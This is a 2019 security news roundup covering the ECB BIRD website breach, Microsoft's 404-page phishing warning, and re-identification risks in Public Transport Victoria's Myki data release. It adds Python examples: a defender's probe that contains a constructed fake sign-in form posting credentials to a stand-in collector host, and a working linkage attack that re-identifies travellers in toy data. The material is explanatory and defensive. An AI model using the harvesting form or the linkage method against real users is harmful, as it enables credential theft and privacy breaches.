Cyber Security News 16 August 2019 – European Central Bank BIRD Website Hacked – Microsoft Warns of New 404 Error Phishing Attacks – Public Transport Victoria Violated Privacy Laws
European Central Bank BIRD Website Hacked
Hackers have again attacked a European Central Bank (ECB) website, according to an ECB announcement. The compromised site hosts the Banks’ Integrated Reporting Dictionary, known as BIRD. Malicious code was discovered during routine website maintenance, and BIRD was shut down after the discovery. The email addresses, names and position titles of 481 BIRD newsletter subscribers may have been compromised.
ECB is the central bank of the euro area and the supervisor of the largest banks in the eurozone. BIRD is its external website documenting the data that banks must extract from their own systems to produce the reports European supervisors require. According to ECB, the site is hosted by an external provider and is physically separate from ECB’s internal systems, so no market-sensitive data was affected. The banks ECB supervises fall under its cyber incident reporting framework and are required to report significant cyber attacks promptly.
In 2014 ECB was compromised. In that attack, hackers stole about 20,000 email addresses, as well as telephone numbers and postal addresses, of ECB conference registrants. That breach was discovered only after the hackers demanded a ransom in exchange for the stolen information.
Microsoft Warns of New 404 Error Phishing Attacks
Microsoft security researchers warned of a new phishing attack. It uses spoofed custom 404 error pages to trick web users into entering their Microsoft login credentials on a fake web page. A custom 404 page is the page a website serves when a user navigates to a non-existent web page or one that has been removed; such pages are also known as “page not found” pages.
The spoofed custom 404 error pages look like legitimate Microsoft account sign-in pages. Even most of the links on the spoofed page lead to legitimate Microsoft web pages. The only phishing links are the “Sign-in options” link above the Next button and the cookies notification at the top of the page. The hackers used a free Firebase subdomain, outlookloffice365user09ngxsmd[.]web[.]app, to host an unlimited number of phishing pages. Instead of creating a single phishing landing page and redirecting victims to it, the attackers register a domain and configure its custom 404 page to show the fake login form. Every non-existent URL under that domain then serves the phishing page, so each victim can be sent a unique, never-before-seen link, which makes blocklisting individual URLs far less effective.
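As an added example, not code from the original article or from Microsoft’s report, the Python below simulates the catch-all behaviour and the check a defender can run against a suspect host: request a few random, certainly non-existent paths and see whether the 404 response carries a password field, which a genuine “page not found” page never does. The site handlers, HTML bodies and the collector URL are constructed stand-ins; in a real probe the handler would be replaced by an HTTP GET against the host. (Static hosts such as Firebase Hosting make the attacker’s side trivial, since an uploaded 404.html is served for any unmatched path.)

```python
import re
import secrets

# Constructed sample bodies. LEGIT_404 is what an honest site returns for an
# unknown path; FAKE_LOGIN is the kind of sign-in form the attacker serves
# as the "custom 404" so that every random URL becomes a phishing page.
LEGIT_404 = ("<html><body><h1>404 Not Found</h1>"
             "<p>The page you requested does not exist.</p></body></html>")
FAKE_LOGIN = """<html><body>
<h1>Sign in</h1>
<form method="post" action="https://collector.example/creds">
  <input type="email" name="loginfmt" placeholder="Email, phone, or Skype">
  <input type="password" name="passwd">
  <a href="https://login.live.com/">Sign-in options</a>
  <button>Next</button>
</form></body></html>"""


def phishing_site(path):
    """Attacker-style server (constructed): one real page, and a catch-all
    404 handler that returns a credential form for every other path."""
    if path == "/":
        return 200, "<html><body>welcome</body></html>"
    return 404, FAKE_LOGIN


def honest_site(path):
    """Normal server (constructed): unknown paths get a plain 404 body."""
    if path in ("/", "/login"):
        return 200, "<html><body>ok</body></html>"
    return 404, LEGIT_404


PASSWORD_FIELD = re.compile(r'<input[^>]+type=["\']?password', re.I)
FORM_ACTION = re.compile(r'<form[^>]+action=["\']?(https?://[^"\'\s>]+)', re.I)


def random_probe_path():
    """A path that cannot exist on any real site, so the response is a 404."""
    return "/" + secrets.token_hex(8)


def looks_like_404_phish(handler, probes=3):
    """Fetch several random, non-existent paths through `handler`, which maps a
    path to (status, body). If a 404 response contains a password input, the
    site is serving a login form on every unknown URL: the 404-page phishing
    technique. Returns (flagged, reasons)."""
    reasons = []
    for _ in range(probes):
        status, body = handler(random_probe_path())
        if status != 404:
            continue
        if PASSWORD_FIELD.search(body):
            reasons.append("404 response contains a password input")
            m = FORM_ACTION.search(body)
            if m:
                reasons.append(f"credential form posts to {m.group(1)}")
            return True, reasons
    return False, reasons


if __name__ == "__main__":
    for name, site in (("phishing_site", phishing_site), ("honest_site", honest_site)):
        flagged, why = looks_like_404_phish(site)
        print(name, "FLAGGED" if flagged else "clean", why)
```

The probe deliberately uses random paths rather than the URL from the phishing email: the attacker’s catch-all means any path reveals the form, and an unknown path also sidesteps per-URL cloaking. The same two-response comparison (random path returns 404 plus a form whose action points off-host) works as a rule in a URL-analysis pipeline.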
Public Transport Victoria Violated Privacy Laws
Australia’s Office of the Victorian Information Commissioner (OVIC) issued a compliance notice to Public Transport Victoria (PTV) for violating the Privacy and Data Protection Act 2014. OVIC found that PTV breached the state’s privacy law by disclosing traveller information for a purpose other than the one for which it was collected, and by failing to protect personal information.
Public Transport Victoria is part of the state’s Department of Transport.
Public Transport Victoria released three years of Myki travel card data, covering the period between July 2015 and June 2018. Data from 1.8 billion travel records from 15.1 million Myki cards was given to the Melbourne Datathon. Myki is the state’s travel card for buses, trams and trains. The Datathon is an event focused on finding innovative uses for data.
In the OVIC report, Data61, part of Australia’s CSIRO national research agency, stated there was “a high risk that some individuals may be re-identified by linking the data set with other information sources.”
The only measure taken to anonymize the data and protect the identities of card holders was to remove the Myki card ID number from each record. Security experts warned PTV that the identities of individual card holders could still be reconstructed by correlating the data with other information. Data privacy researchers then set out to show how an Australian’s travel records and whereabouts over three years could be recovered. Trips taken on the same Myki card remained linked together, along with the location and precise time of each tap-on. The type of card, which was not redacted, also gave insights into who was using it: categories include government officials as well as members of Parliament.
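The re-identification the researchers described is a linkage attack: an adversary who knows a handful of facts about a target (where and roughly when they tapped on) matches those facts against the “de-identified” records, and once a single card token fits, the whole three-year history of that card is exposed. The Python below, an added example that is not from the article, OVIC or the researchers, works through that on a constructed toy dataset in the shape of the released data: the card number is gone, but a per-card token, the card type, the stop and the tap time remain. The card type label “Victorian Parliament”, the stop names and all records are invented for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

FMT = "%Y-%m-%d %H:%M"

# Constructed sample of "de-identified" tap-on records:
# (card_token, card_type, stop, tap_time). The Myki number has been removed,
# but the token still links every tap made with one card, and card type,
# stop and time are untouched, exactly the weakness the article describes.
RECORDS = [
    ("c1", "Full Fare", "Flinders St", "2017-07-03 08:12"),
    ("c1", "Full Fare", "Richmond", "2017-07-03 17:40"),
    ("c1", "Full Fare", "Flinders St", "2017-07-04 08:09"),
    ("c1", "Full Fare", "Richmond", "2017-07-04 17:55"),
    ("c1", "Full Fare", "Box Hill", "2017-07-08 10:30"),
    ("c2", "Full Fare", "Flinders St", "2017-07-03 08:12"),
    ("c2", "Full Fare", "Southern Cross", "2017-07-03 18:02"),
    ("c2", "Full Fare", "Flinders St", "2017-07-04 08:14"),
    ("c3", "Victorian Parliament", "Parliament", "2017-07-03 09:05"),
    ("c3", "Victorian Parliament", "Flinders St", "2017-07-03 19:20"),
]


def parse(ts):
    return datetime.strptime(ts, FMT)


def by_card(records):
    """Group taps by the per-card token that survived 'anonymization'."""
    cards = defaultdict(list)
    for token, ctype, stop, ts in records:
        cards[token].append((ctype, stop, parse(ts)))
    return cards


def link_target(records, observations, tolerance_minutes=5, card_type=None):
    """Linkage attack. `observations` are (stop, time) facts the adversary knows
    about the target, e.g. having seen them tap on. A card is a candidate if it
    has a tap at every observed stop within `tolerance_minutes` of the observed
    time (and, optionally, is of the given card type). Returns the candidate
    tokens; one token means the target is uniquely re-identified."""
    tol = timedelta(minutes=tolerance_minutes)
    candidates = set()
    for token, taps in by_card(records).items():
        if card_type is not None and not all(t[0] == card_type for t in taps):
            continue
        if all(any(stop == s and abs(when - parse(ts)) <= tol
                   for _, s, when in taps)
               for stop, ts in observations):
            candidates.add(token)
    return candidates


def travel_history(records, token):
    """Once a token is linked to a person, every trip on that card is theirs."""
    return sorted((ts, stop) for t, _, stop, ts in records if t == token)


def cards_of_type(records, card_type):
    """Rare card categories (e.g. a parliamentary card) form tiny groups, so
    the category alone narrows the search to a handful of people."""
    return {t for t, ctype, _, _ in records if ctype == card_type}


if __name__ == "__main__":
    seen_once = [("Flinders St", "2017-07-03 08:12")]
    print("one observation ->", link_target(RECORDS, seen_once))      # two candidates
    seen_twice = seen_once + [("Richmond", "2017-07-03 17:40")]
    target = link_target(RECORDS, seen_twice)
    print("two observations ->", target)                                # unique
    print("full history:", travel_history(RECORDS, target.pop()))
    print("parliament cards:", cards_of_type(RECORDS, "Victorian Parliament"))
```

Two points the example makes concrete: a single observation is usually ambiguous, but two or three (a morning tap plus an evening tap on one day) are enough to isolate one card among millions, and the retained card type collapses the anonymity set for small categories before any timing is needed. Removing a direct identifier while leaving a stable per-card token is pseudonymization, not anonymization.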